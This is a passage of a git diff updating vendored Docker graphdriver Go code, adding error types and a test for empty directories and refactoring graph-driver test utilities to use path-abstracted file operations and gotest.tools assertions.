-		logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", mountPath)
-		C.free(unsafe.Pointer(buf))
-		return false, ErrPrerequisites
-	}
-
-	C.free(unsafe.Pointer(buf))
-	C.free(unsafe.Pointer(cs))
-	return true, nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go
new file mode 100644
index 0000000000..e6f973c397
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_test.go
@@ -0,0 +1,36 @@
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"gotest.tools/assert"
+)
+
+func TestIsEmptyDir(t *testing.T) {
+	tmp, err := ioutil.TempDir("", "test-is-empty-dir")
+	assert.NilError(t, err)
+	defer os.RemoveAll(tmp)
+
+	d := filepath.Join(tmp, "empty-dir")
+	err = os.Mkdir(d, 0755)
+	assert.NilError(t, err)
+	empty := isEmptyDir(d)
+	assert.Check(t, empty)
+
+	d = filepath.Join(tmp, "dir-with-subdir")
+	err = os.MkdirAll(filepath.Join(d, "subdir"), 0755)
+	assert.NilError(t, err)
+	empty = isEmptyDir(d)
+	assert.Check(t, !empty)
+
+	d = filepath.Join(tmp, "dir-with-empty-file")
+	err = os.Mkdir(d, 0755)
+	assert.NilError(t, err)
+	_, err = ioutil.TempFile(d, "file")
+	assert.NilError(t, err)
+	empty = isEmptyDir(d)
+	assert.Check(t, !empty)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go
index 4a875608b0..1f2e8f071b 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go
@@ -1,12 +1,10 @@
-// +build !linux,!windows,!freebsd,!solaris
+// +build !linux,!windows,!freebsd
 
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 var (
-	// Slice of drivers that should be used in an order
-	priority = []string{
-		"unsupported",
-	}
+	// List of drivers that should be used in an order
+	priority = "unsupported"
 )
 
 // GetFSMagic returns the filesystem id given the path.
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go
index ffd30c2950..856b575e75 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go
@@ -1,10 +1,8 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 var (
-	// Slice of drivers that should be used in order
-	priority = []string{
-		"windowsfilter",
-	}
+	// List of drivers that should be used in order
+	priority = "windowsfilter"
 )
 
 // GetFSMagic returns the filesystem id given the path.
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/errors.go b/vendor/github.com/docker/docker/daemon/graphdriver/errors.go
new file mode 100644
index 0000000000..96d3544552
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/errors.go
@@ -0,0 +1,36 @@
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
+
+const (
+	// ErrNotSupported returned when driver is not supported.
+	ErrNotSupported NotSupportedError = "driver not supported"
+	// ErrPrerequisites returned when driver does not meet prerequisites.
+	ErrPrerequisites NotSupportedError = "prerequisites for driver not satisfied (wrong filesystem?)"
+	// ErrIncompatibleFS returned when file system is not supported.
+	ErrIncompatibleFS NotSupportedError = "backing file system is unsupported for this graph driver"
+)
+
+// ErrUnSupported signals that the graph-driver is not supported on the current configuration
+type ErrUnSupported interface {
+	NotSupported()
+}
+
+// NotSupportedError signals that the graph-driver is not supported on the current configuration
+type NotSupportedError string
+
+func (e NotSupportedError) Error() string {
+	return string(e)
+}
+
+// NotSupported signals that a graph-driver is not supported.
+func (e NotSupportedError) NotSupported() {}
+
+// IsDriverNotSupported returns true if the error initializing
+// the graph driver is a non-supported error.
+func IsDriverNotSupported(err error) bool {
+	switch err.(type) {
+	case ErrUnSupported:
+		return true
+	default:
+		return false
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go
index 20826cd7d2..e1f368508a 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go
@@ -1,14 +1,14 @@
-package graphdriver
+package graphdriver // import "github.com/docker/docker/daemon/graphdriver"
 
 import (
 	"io"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/chrootarchive"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -18,9 +18,9 @@ var (
 )
 
 // NaiveDiffDriver takes a ProtoDriver and adds the
-// capability of the Diffing methods which it may or may not
-// support on its own. See the comment on the exported
-// NewNaiveDiffDriver function below.
+// capability of the Diffing methods on the local file system,
+// which it may or may not support on its own. See the comment
+// on the exported NewNaiveDiffDriver function below.
 // Notably, the AUFS driver doesn't need to be wrapped like this.
 type NaiveDiffDriver struct {
 	ProtoDriver
@@ -47,10 +47,11 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err
 	startTime := time.Now()
 	driver := gdw.ProtoDriver
 
-	layerFs, err := driver.Get(id, "")
+	layerRootFs, err := driver.Get(id, "")
 	if err != nil {
 		return nil, err
 	}
+	layerFs := layerRootFs.Path()
 
 	defer func() {
 		if err != nil {
@@ -70,12 +71,14 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err
 		}), nil
 	}
 
-	parentFs, err := driver.Get(parent, "")
+	parentRootFs, err := driver.Get(parent, "")
 	if err != nil {
 		return nil, err
 	}
 	defer driver.Put(parent)
 
+	parentFs := parentRootFs.Path()
+
 	changes, err := archive.ChangesDirs(layerFs, parentFs)
 	if err != nil {
 		return nil, err
@@ -94,7 +97,7 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err
 		// are extracted from tar's with full second precision on modified time.
 		// We need this hack here to make sure calls within same second receive
 		// correct result.
-		time.Sleep(startTime.Truncate(time.Second).Add(time.Second).Sub(time.Now()))
+		time.Sleep(time.Until(startTime.Truncate(time.Second).Add(time.Second)))
 		return err
 	}), nil
 }
@@ -104,20 +107,22 @@ func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err err
 func (gdw *NaiveDiffDriver) Changes(id, parent string) ([]archive.Change, error) {
 	driver := gdw.ProtoDriver
 
-	layerFs, err := driver.Get(id, "")
+	layerRootFs, err := driver.Get(id, "")
 	if err != nil {
 		return nil, err
 	}
 	defer driver.Put(id)
 
+	layerFs := layerRootFs.Path()
 	parentFs := ""
 
 	if parent != "" {
-		parentFs, err = driver.Get(parent, "")
+		parentRootFs, err := driver.Get(parent, "")
 		if err != nil {
 			return nil, err
 		}
 		defer driver.Put(parent)
+		parentFs = parentRootFs.Path()
 	}
 
 	return archive.ChangesDirs(layerFs, parentFs)
@@ -130,12 +135,13 @@ func (gdw *NaiveDiffDriver) ApplyDiff(id, parent string, diff io.Reader) (size i
 	driver := gdw.ProtoDriver
 
 	// Mount the root filesystem so we can apply the diff/layer.
-	layerFs, err := driver.Get(id, "")
+	layerRootFs, err := driver.Get(id, "")
 	if err != nil {
 		return
 	}
 	defer driver.Put(id)
 
+	layerFs := layerRootFs.Path()
 	options := &archive.TarOptions{UIDMaps: gdw.uidMaps,
 		GIDMaps: gdw.gidMaps}
 	start := time.Now().UTC()
@@ -165,5 +171,5 @@ func (gdw *NaiveDiffDriver) DiffSize(id, parent string) (size int64, err error)
 	}
 	defer driver.Put(id)
 
-	return archive.ChangesSize(layerFs, changes), nil
+	return archive.ChangesSize(layerFs.Path(), changes), nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go
index def822b9a1..22de8d1781 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go
@@ -1,15 +1,15 @@
 // +build linux freebsd
 
-package graphtest
+package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest"
 
 import (
-	"bytes"
 	"io"
 	"io/ioutil"
-	"path/filepath"
 	"testing"
 
+	contdriver "github.com/containerd/continuity/driver"
 	"github.com/docker/docker/pkg/stringid"
+	"gotest.tools/assert"
 )
 
 // DriverBenchExists benchmarks calls to exist
@@ -245,15 +245,13 @@ func DriverBenchDeepLayerRead(b *testing.B, layerCount int, drivername string, d
 	for i := 0; i < b.N; i++ {
 
 		// Read content
-		c, err := ioutil.ReadFile(filepath.Join(root, "testfile.txt"))
+		c, err := contdriver.ReadFile(root, root.Join(root.Path(), "testfile.txt"))
 		if err != nil {
 			b.Fatal(err)
 		}
 
 		b.StopTimer()
-		if bytes.Compare(c, content) != 0 {
-			b.Fatalf("Wrong content in file %v, expected %v", c, content)
-		}
+		assert.DeepEqual(b, content, c)
 		b.StartTimer()
 	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go
index 6e952de78b..e83d0bb2ad 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go
@@ -1,6 +1,6 @@
-// +build linux freebsd solaris
+// +build linux freebsd
 
-package graphtest
+package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest"
 
 import (
 	"bytes"
@@ -9,13 +9,16 @@ import (
 	"os"
 	"path"
 	"reflect"
-	"syscall"
 	"testing"
 	"unsafe"
 
 	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/daemon/graphdriver/quota"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/go-units"
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 var (
@@ -33,18 +36,13 @@ type Driver struct {
 
 func newDriver(t testing.TB, name string, options []string) *Driver {
 	root, err := ioutil.TempDir("", "docker-graphtest-")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if err := os.MkdirAll(root, 0755); err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
+	assert.NilError(t, os.MkdirAll(root, 0755))
 	d, err := graphdriver.GetDriver(name, nil, graphdriver.Options{DriverOptions: options, Root: root})
 	if err != nil {
 		t.Logf("graphdriver: %v\n", err)
-		if err == graphdriver.ErrNotSupported || err == graphdriver.ErrPrerequisites || err == graphdriver.ErrIncompatibleFS {
+		if graphdriver.IsDriverNotSupported(err) {
 			t.Skipf("Driver %s not supported", name)
 		}
 		t.Fatal(err)
@@ -86,14 +84,11 @@ func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...str
 	driver := GetDriver(t, drivername, driverOptions...)
 	defer PutDriver(t)
 
-	if err := driver.Create("empty", "", nil); err != nil {
-		t.Fatal(err)
-	}
+	err := driver.Create("empty", "", nil)
+	assert.NilError(t, err)
 
 	defer func() {
-		if err := driver.Remove("empty"); err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, driver.Remove("empty"))
 	}()
 
 	if !driver.Exists("empty") {
@@ -101,21 +96,14 @@ func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...str
 	}
 
 	dir, err := driver.Get("empty", "")
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
-	verifyFile(t, dir, 0755|os.ModeDir, 0, 0)
+	verifyFile(t, dir.Path(), 0755|os.ModeDir, 0, 0)
 
 	// Verify that the directory is empty
-	fis, err := readDir(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(fis) != 0 {
-		t.Fatal("New directory not empty")
-	}
+	fis, err := readDir(dir, dir.Path())
+	assert.NilError(t, err)
+	assert.Check(t, is.Len(fis, 0))
 
 	driver.Put("empty")
 }
@@ -127,9 +115,7 @@ func DriverTestCreateBase(t testing.TB, drivername string, driverOptions ...stri
 
 	createBase(t, driver, "Base")
 	defer func() {
-		if err := driver.Remove("Base"); err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, driver.Remove("Base"))
 	}()
 	verifyBase(t, driver, "Base")
 }
@@ -140,21 +126,14 @@ func DriverTestCreateSnap(t testing.TB, drivername string, driverOptions ...stri
 	defer PutDriver(t)
 
 	createBase(t, driver, "Base")
-
 	defer func() {
-		if err := driver.Remove("Base"); err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, driver.Remove("Base"))
 	}()
 
-	if err := driver.Create("Snap", "Base", nil); err != nil {
-		t.Fatal(err)
-	}
-
+	err := driver.Create("Snap", "Base", nil)
+	assert.NilError(t, err)
 	defer func() {
-		if err := driver.Remove("Snap"); err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, driver.Remove("Snap"))
 	}()
 
 	verifyBase(t, driver, "Snap")
@@ -332,7 +311,7 @@ func writeRandomFile(path string, size uint64) error {
 }
 
 // DriverTestSetQuota Create a driver and test setting quota.
-func DriverTestSetQuota(t *testing.T, drivername string) {
+func DriverTestSetQuota(t *testing.T, drivername string, required bool) {
 	driver := GetDriver(t, drivername)
 	defer PutDriver(t)
 
@@ -340,19 +319,34 @@ func DriverTestSetQuota(t *testing.T, drivername string) {
 	createOpts := &graphdriver.CreateOpts{}
 	createOpts.StorageOpt = make(map[string]string, 1)
 	createOpts.StorageOpt["size"] = "50M"
-	if err := driver.Create("zfsTest", "Base", createOpts); err != nil {
+	layerName := drivername + "Test"
+	if err := driver.CreateReadWrite(layerName, "Base", createOpts); err == quota.ErrQuotaNotSupported && !required {
+		t.Skipf("Quota not supported on underlying filesystem: %v", err)
+	} else if err != nil {
 		t.Fatal(err)
 	}
 
-	mountPath, err := driver.Get("zfsTest", "")
+	mountPath, err := driver.Get(layerName, "")
 	if err != nil {
 		t.Fatal(err)
 	}
 
 	quota := uint64(50 * units.MiB)
-	err = writeRandomFile(path.Join(mountPath, "file"), quota*2)
-	if pathError, ok := err.(*os.PathError); ok && pathError.Err != syscall.EDQUOT {
-		t.Fatalf("expect write() to fail with %v, got %v", syscall.EDQUOT, err)
+
+	// Try to write a file smaller than quota, and ensure it works
+	err = writeRandomFile(path.Join(mountPath.Path(), "smallfile"), quota/2)
+	if err != nil {
+		t.Fatal(err)
 	}
+	defer os.Remove(path.Join(mountPath.Path(), "smallfile"))
 
+	// Try to write a file bigger than quota. We've already filled up half the quota, so hitting the limit should be easy
+	err = writeRandomFile(path.Join(mountPath.Path(), "bigfile"), quota)
+	if err == nil {
+		t.Fatalf("expected write to fail(), instead had success")
+	}
+	if pathError, ok := err.(*os.PathError); ok && pathError.Err != unix.EDQUOT && pathError.Err != unix.ENOSPC {
+		os.Remove(path.Join(mountPath.Path(), "bigfile"))
+		t.Fatalf("expect write() to fail with %v or %v, got %v", unix.EDQUOT, unix.ENOSPC, pathError.Err)
+	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go
index a50c5211e3..c6a03f341e 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go
@@ -1 +1 @@
-package graphtest
+package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest"
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go
index 35bf6d17ba..258aba7002 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go
@@ -1,14 +1,13 @@
-package graphtest
+package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest"
 
 import (
 	"bytes"
 	"fmt"
-	"io/ioutil"
 	"math/rand"
 	"os"
-	"path"
 	"sort"
 
+	"github.com/containerd/continuity/driver"
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/stringid"
@@ -36,17 +35,17 @@ func addFiles(drv graphdriver.Driver, layer string, seed int64) error {
 	}
 	defer drv.Put(layer)
 
-	if err := ioutil.WriteFile(path.Join(root, "file-a"), randomContent(64, seed), 0755); err != nil {
+	if err := driver.WriteFile(root, root.Join(root.Path(), "file-a"), randomContent(64, seed), 0755); err != nil {
 		return err
 	}
-	if err := os.MkdirAll(path.Join(root, "dir-b"), 0755); err != nil {
+	if err := root.MkdirAll(root.Join(root.Path(), "dir-b"), 0755); err != nil {
 		return err
 	}
-	if err := ioutil.WriteFile(path.Join(root, "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil {
+	if err := driver.WriteFile(root, root.Join(root.Path(), "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil {
 		return err
 	}
 
-	return ioutil.WriteFile(path.Join(root, "file-c"), randomContent(128*128, seed+2), 0755)
+	return driver.WriteFile(root, root.Join(root.Path(), "file-c"), randomContent(128*128, seed+2), 0755)
 }
 
 func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) error {
@@ -56,12 +55,12 @@ func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) e
 	}
 	defer drv.Put(layer)
 
-	fileContent, err := ioutil.ReadFile(path.Join(root, filename))
+	fileContent, err := driver.ReadFile(root, root.Join(root.Path(), filename))
 	if err != nil {
 		return err
 	}
 
-	if bytes.Compare(fileContent, content) != 0 {
+	if !bytes.Equal(fileContent, content) {
 		return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content)
 	}
 
@@ -75,7 +74,7 @@ func addFile(drv graphdriver.Driver, layer, filename string, content []byte) err
 	}
 	defer drv.Put(layer)
 
-	return ioutil.WriteFile(path.Join(root, filename), content, 0755)
+	return driver.WriteFile(root, root.Join(root.Path(), filename), content, 0755)
 }
 
 func addDirectory(drv graphdriver.Driver, layer, dir string) error {
@@ -85,7 +84,7 @@ func addDirectory(drv graphdriver.Driver, layer, dir string) error {
 	}
 	defer drv.Put(layer)
 
-	return os.MkdirAll(path.Join(root, dir), 0755)
+	return root.MkdirAll(root.Join(root.Path(), dir), 0755)
 }
 
 func removeAll(drv graphdriver.Driver, layer string, names ...string) error {
@@ -96,7 +95,7 @@ func removeAll(drv graphdriver.Driver, layer string, names ...string) error {
 	defer drv.Put(layer)
 
 	for _, filename := range names {
-		if err := os.RemoveAll(path.Join(root, filename)); err != nil {
+		if err := root.RemoveAll(root.Join(root.Path(), filename)); err != nil {
 			return err
 		}
 	}
@@ -110,8 +109,8 @@ func checkFileRemoved(drv graphdriver.Driver, layer, filename string) error {
 	}
 	defer drv.Put(layer)
 
-	if _, err := os.Stat(path.Join(root, filename)); err == nil {
-		return fmt.Errorf("file still exists: %s", path.Join(root, filename))
+	if _, err := root.Stat(root.Join(root.Path(), filename)); err == nil {
+		return fmt.Errorf("file still exists: %s", root.Join(root.Path(), filename))
 	} else if !os.IsNotExist(err) {
 		return err
 	}
@@ -127,13 +126,13 @@ func addManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) e
 	defer drv.Put(layer)
 
 	for i := 0; i < count; i += 100 {
-		dir := path.Join(root, fmt.Sprintf("directory-%d", i))
-		if err := os.MkdirAll(dir, 0755); err != nil {
+		dir := root.Join(root.Path(), fmt.Sprintf("directory-%d", i))
+		if err := root.MkdirAll(dir, 0755); err != nil {
 			return err
 		}
 		for j := 0; i+j < count && j < 100; j++ {
-			file := path.Join(dir, fmt.Sprintf("file-%d", i+j))
-			if err := ioutil.WriteFile(file, randomContent(64, seed+int64(i+j)), 0755); err != nil {
+			file := root.Join(dir, fmt.Sprintf("file-%d", i+j))
+			if err := driver.WriteFile(root, file, randomContent(64, seed+int64(i+j)), 0755); err != nil {
 				return err
 			}
 		}
@@ -149,10 +148,10 @@ func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64
 	}
 	defer drv.Put(layer)
 
-	changes := []archive.Change{}
+	var changes []archive.Change
 	for i := 0; i < count; i += 100 {
 		archiveRoot := fmt.Sprintf("/directory-%d", i)
-		if err := os.MkdirAll(path.Join(root, archiveRoot), 0755); err != nil {
+		if err := root.MkdirAll(root.Join(root.Path(), archiveRoot), 0755); err != nil {
 			return nil, err
 		}
 		for j := 0; i+j < count && j < 100; j++ {
@@ -166,23 +165,23 @@ func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64
 			switch j % 3 {
 			// Update file
 			case 0:
-				change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j))
+				change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d", i+j))
 				change.Kind = archive.ChangeModify
-				if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil {
+				if err := driver.WriteFile(root, root.Join(root.Path(), change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil {
 					return nil, err
 				}
 			// Add file
 			case 1:
-				change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j))
+				change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j))
 				change.Kind = archive.ChangeAdd
-				if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil {
+				if err := driver.WriteFile(root, root.Join(root.Path(), change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil {
 					return nil, err
 				}
 			// Remove file
 			case 2:
-				change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j))
+				change.Path = root.Join(archiveRoot, fmt.Sprintf("file-%d", i+j))
 				change.Kind = archive.ChangeDelete
-				if err := os.Remove(path.Join(root, change.Path)); err != nil {
+				if err := root.Remove(root.Join(root.Path(), change.Path)); err != nil {
 					return nil, err
 				}
 			}
@@ -201,17 +200,17 @@ func checkManyFiles(drv graphdriver.Driver, layer string, count int, seed int64)
 	defer drv.Put(layer)
 
 	for i := 0; i < count; i += 100 {
-		dir := path.Join(root, fmt.Sprintf("directory-%d", i))
+		dir := root.Join(root.Path(), fmt.Sprintf("directory-%d", i))
 		for j := 0; i+j < count && j < 100; j++ {
-			file := path.Join(dir, fmt.Sprintf("file-%d", i+j))
-			fileContent, err := ioutil.ReadFile(file)
+			file := root.Join(dir, fmt.Sprintf("file-%d", i+j))
+			fileContent, err := driver.ReadFile(root, file)
 			if err != nil {
 				return err
 			}
 
 			content := randomContent(64, seed+int64(i+j))
 
-			if bytes.Compare(fileContent, content) != 0 {
+			if !bytes.Equal(fileContent, content) {
 				return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content)
 			}
 		}
@@ -254,21 +253,17 @@ func addLayerFiles(drv graphdriver.Driver, layer, parent string, i int) error {
 	}
 	defer drv.Put(layer)
 
-	if err := ioutil.WriteFile(path.Join(root, "top-id"), []byte(layer), 0755); err != nil {
+	if err := driver.WriteFile(root, root.Join(root.Path(), "top-id"), []byte(layer), 0755); err != nil {
 		return err
 	}
-	layerDir := path.Join(root, fmt.Sprintf("layer-%d", i))
-	if err := os.MkdirAll(layerDir, 0755); err != nil {
+	layerDir := root.Join(root.Path(), fmt.Sprintf("layer-%d", i))
+	if err := root.MkdirAll(layerDir, 0755); err != nil {
 		return err
 	}
-	if err := ioutil.WriteFile(path.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil {
+	if err := driver.WriteFile(root, root.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil {
 		return err
 	}
-	if err := ioutil.WriteFile(path.Join(layerDir, "parent-id"), []byte(parent), 0755); err != nil {
-		return err
-	}
-
-	return nil
+	return driver.WriteFile(root, root.Join(layerDir, "parent-id"), []byte(parent), 0755)
 }
 
 func addManyLayers(drv graphdriver.Driver, baseLayer string, count int) (string, error) {
@@ -295,26 +290,26 @@ func checkManyLayers(drv graphdriver.Driver, layer string, count int) error {
 	}
 	defer drv.Put(layer)
 
-	layerIDBytes, err := ioutil.ReadFile(path.Join(root, "top-id"))
+	layerIDBytes, err := driver.ReadFile(root, root.Join(root.Path(), "top-id"))
 	if err != nil {
 		return err
 	}
 
-	if bytes.Compare(layerIDBytes, []byte(layer)) != 0 {
+	if !bytes.Equal(layerIDBytes, []byte(layer)) {
 		return fmt.Errorf("mismatched file content %v, expecting %v", layerIDBytes, []byte(layer))
 	}
 
 	for i := count; i > 0; i-- {
-		layerDir := path.Join(root, fmt.Sprintf("layer-%d", i))
+		layerDir := root.Join(root.Path(), fmt.Sprintf("layer-%d", i))
 
-		thisLayerIDBytes, err := ioutil.ReadFile(path.Join(layerDir, "layer-id"))
+		thisLayerIDBytes, err := driver.ReadFile(root, root.Join(layerDir, "layer-id"))
 		if err != nil {
 			return err
 		}
-		if bytes.Compare(thisLayerIDBytes, layerIDBytes) != 0 {
+		if !bytes.Equal(thisLayerIDBytes, layerIDBytes) {
 			return fmt.Errorf("mismatched file content %v, expecting %v", thisLayerIDBytes, layerIDBytes)
 		}
-		layerIDBytes, err = ioutil.ReadFile(path.Join(layerDir, "parent-id"))
+		layerIDBytes, err = driver.ReadFile(root, root.Join(layerDir, "parent-id"))
 		if err != nil {
 			return err
 		}
@@ -322,11 +317,11 @@ func checkManyLayers(drv graphdriver.Driver, layer string, count int) error {
 	return nil
 }
 
-// readDir reads a directory just like ioutil.ReadDir()
+// readDir reads a directory just like driver.ReadDir()
 // then hides specific files (currently "lost+found")
 // so the tests don't "see" it
-func readDir(dir string) ([]os.FileInfo, error) {
-	a, err := ioutil.ReadDir(dir)
+func readDir(r driver.Driver, dir string) ([]os.FileInfo, error) {
+	a, err := driver.ReadDir(r, dir)
 	if err != nil {
 		return nil, err
 	}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go
index 49b0c2cc35..6871dca09a 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go
@@ -1,143 +1,69 @@
 // +build linux freebsd
 
-package graphtest
+package graphtest // import "github.com/docker/docker/daemon/graphdriver/graphtest"
 
 import (
-	"fmt"
-	"io/ioutil"
 	"os"
-	"path"
 	"syscall"
 	"testing"
 
+	contdriver "github.com/containerd/continuity/driver"
 	"github.com/docker/docker/daemon/graphdriver"
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
-// InitLoopbacks ensures that the loopback devices are properly created within
-// the system running the device mapper tests.
-func InitLoopbacks() error {
-	statT, err := getBaseLoopStats()
-	if err != nil {
-		return err
-	}
-	// create at least 8 loopback files, ya, that is a good number
-	for i := 0; i < 8; i++ {
-		loopPath := fmt.Sprintf("/dev/loop%d", i)
-		// only create new loopback files if they don't exist
-		if _, err := os.Stat(loopPath); err != nil {
-			if mkerr := syscall.Mknod(loopPath,
-				uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil {
-				return mkerr
-			}
-			os.Chown(loopPath, int(statT.Uid), int(statT.Gid))
-		}
-	}
-	return nil
-}
-
-// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the
-// loop0 device on the system.  If it does not exist we assume 0,0,0660 for the
-// stat data
-func getBaseLoopStats() (*syscall.Stat_t, error) {
-	loop0, err := os.Stat("/dev/loop0")
-	if err != nil {
-		if os.IsNotExist(err) {
-			return &syscall.Stat_t{
-				Uid:  0,
-				Gid:  0,
-				Mode: 0660,
-			}, nil
-		}
-		return nil, err
-	}
-	return loop0.Sys().(*syscall.Stat_t), nil
-}
-
 func verifyFile(t testing.TB, path string, mode os.FileMode, uid, gid uint32) {
 	fi, err := os.Stat(path)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if fi.Mode()&os.ModeType != mode&os.ModeType {
-		t.Fatalf("Expected %s type 0x%x, got 0x%x", path, mode&os.ModeType, fi.Mode()&os.ModeType)
-	}
+	assert.NilError(t, err)
 
-	if fi.Mode()&os.ModePerm != mode&os.ModePerm {
-		t.Fatalf("Expected %s mode %o, got %o", path, mode&os.ModePerm, fi.Mode()&os.ModePerm)
-	}
-
-	if fi.Mode()&os.ModeSticky != mode&os.ModeSticky {
-		t.Fatalf("Expected %s sticky 0x%x, got 0x%x", path, mode&os.ModeSticky, fi.Mode()&os.ModeSticky)
-	}
-
-	if fi.Mode()&os.ModeSetuid != mode&os.ModeSetuid {
-		t.Fatalf("Expected %s setuid 0x%x, got 0x%x", path, mode&os.ModeSetuid, fi.Mode()&os.ModeSetuid)
-	}
-
-	if fi.Mode()&os.ModeSetgid != mode&os.ModeSetgid {
-		t.Fatalf("Expected %s setgid 0x%x, got 0x%x", path, mode&os.ModeSetgid, fi.Mode()&os.ModeSetgid)
-	}
+	actual := fi.Mode()
+	assert.Check(t, is.Equal(mode&os.ModeType, actual&os.ModeType), path)
+	assert.Check(t, is.Equal(mode&os.ModePerm, actual&os.ModePerm), path)
+	assert.Check(t, is.Equal(mode&os.ModeSticky, actual&os.ModeSticky), path)
